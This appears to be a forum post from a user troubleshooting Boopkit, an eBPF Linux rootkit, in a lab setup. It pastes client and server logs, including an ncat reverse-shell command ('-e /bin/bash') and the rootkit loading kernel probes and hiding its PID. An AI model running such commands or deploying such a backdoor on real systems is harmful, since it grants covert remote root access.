So I already compiled Boopkit.
On the server side (IP 10.10.10.10) I run the boopkit binary.
On the client (IP 10.10.10.8) I run the boopscript after I change the RHOST and the LHOST:
RHOST = 10.10.10.10
LHOST = 10.10.10.8
Ports 22, 3535 and 3545 are open (inbound) on both sides.
When I try to run it from the client:
-> *[RCE] : ncat 10.10.10.8 3545 -e /bin/bash &
-> *[Local] : 10.10.10.8:3535
-> *[Remote] : 10.10.10.10:22
================================================================
-> [112 bytes] TX SYN : 10.10.10.10 (SOCK_RAW, RCE, *bad csum)
-> [handshake] CONN : 10.10.10.10:22
-> [060 bytes] TX SYN : 10.10.10.10:22
<- [048 bytes] RX SYN-ACK : 10.10.10.10:22 (RCE)
-> [060 bytes] TX ACK-RST : 10.10.10.10:22
-> [hanging..] CONN : 10.10.10.8:3535 (listen...)
From the server side:
================================================================
-> getuid() : 0
-> getpid() : 1246
-> getppid() : 1064
-> Logs : /sys/kernel/tracing/trace_pipe
-> Loading eBPF Probe : /root/.boopkit/pr0be.safe.o
-> Starting xCap Interface : lo
-> Initalizing Ring Buffer
-> eBPF Probe Loaded : /root/.boopkit/pr0be.safe.o
-> Loading eBPF Probe : /root/.boopkit/pr0be.boop.o
-> eBPF Probe Loaded : /root/.boopkit/pr0be.boop.o
-> eBPF Program Attached : tp/tcp/tcp_bad_csum
-> eBPF Program Attached : tp/tcp/tcp_receive_reset
-> eBPF Map Name : event
-> Obfuscating PID : 1246
-> xCap RingBuffer Started : lo
================================================================
** Boop source: 10.10.10.8
-> Search xCap Ring Buffer: 10.10.10.8
-> Initalizing Ring Buffer
-> Taking snapshot of network traffic.
-> No RCE in xCap!
-> Free Ring Buffer
** Boop source: 10.10.10.10
-> Search xCap Ring Buffer: 10.10.10.10
-> Initalizing Ring Buffer
-> Taking snapshot of network traffic.
-> No RCE in xCap!
-> Free Ring Buffer
** Boop source: 10.10.10.10
-> Search xCap Ring Buffer: 10.10.10.10
-> Initalizing Ring Buffer
-> Taking snapshot of network traffic.
-> No RCE in xCap!
-> Free Ring Buffer
** Boop source: 10.10.10.10
-> Search xCap Ring Buffer: 10.10.10.10
-> Initalizing Ring Buffer
-> Taking snapshot of network traffic.
-> No RCE in xCap!
-> Free Ring Buffer
What am I doing wrong?